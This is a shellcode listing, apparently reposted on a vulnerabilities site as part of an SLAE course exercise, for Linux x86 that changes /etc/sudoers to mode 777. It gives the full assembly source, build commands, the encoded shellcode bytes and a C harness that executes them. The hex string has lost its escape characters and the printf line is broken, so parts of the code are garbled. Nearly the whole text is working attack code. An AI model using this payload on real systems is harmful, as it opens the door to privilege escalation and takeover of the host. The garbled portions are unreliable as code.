/*
################## Description ####################
; Title : chmod 777 /etc/sudoers - Shellcode
; Author : Hashim Jawad
; Website : ihack4falafel[.]com
################## Description ####################
; Title : chmod 777 /etc/sudoers - Shellcode
; Author : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : chmod /etc/sudoers permissions
; OS : Linux
; Arch : x86
; Size : 36 bytes
################### chmod.nasm #####################
global _start
section .text
_start:
; push NULL into stack
xor edx, edx
push edx
; push (/etc/sudoers) into stack
push 0x7372656f
push 0x6475732f
push 0x6374652f
; store ESP pointer in EBX
mov ebx, esp
; store octal value of (777) in CX
mov cx, 0x1ff
; execute __NR_chmod syscall
xor eax, eax
mov al, 0xf
int 0x80
; execute __NR_exit syscall
xor eax, eax
mov al,0x1
int 0x80
################### chmod binary #####################
nasm -f elf32 -o chmod.o chmod.nasm
ld -z execstack -o chmod chmod.o
################### Shellcode ########################
objdump -d chmod -M intel
################## Compile #########################
gcc -fno-stack-protector -z execstack chmod.c -o chmod
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"x31xd2x52x68x6fx65x72x73x68x2fx73x75x64x68x2fx65x74x63x89xe3x66xb9xffx01x31xc0xb0x0fxcdx80x31xc0xb0x01xcdx80";
main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Linux x86 chmod 777 etc sudoers Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 437